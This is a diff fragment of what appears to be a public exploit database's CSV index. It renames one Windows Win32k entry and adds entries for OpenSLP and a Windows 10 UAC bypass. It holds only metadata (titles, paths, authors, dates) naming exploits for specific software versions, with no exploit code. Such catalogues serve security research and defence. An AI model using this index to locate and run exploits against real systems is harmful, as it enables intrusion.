45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86, 45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows, @@ -10072,7 +10072,7 @@ id,file,description,date,author,type,platform,port 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows, 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, -45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, +45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, 45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows, 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows, 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86, @@ -10089,6 +10089,8 @@ id,file,description,date,author,type,platform,port 45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware, 45796,exploits/windows_x86/local/45796.py,"Arm Whois 3.11 - Buffer Overflow (SEH)",2018-11-06,"Semen Alexandrovich Lyhin",local,windows_x86, 45798,exploits/linux/local/45798.txt,"libiec61850 1.3 - Stack Based Buffer Overflow",2018-11-06,"Dhiraj Mishra",local,linux, +45804,exploits/linux/local/45804.txt,"OpenSLP 2.0.0 - Multiple Vulnerabilities",2018-11-07,"Magnus Klaaborg Stubman",local,linux, +45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139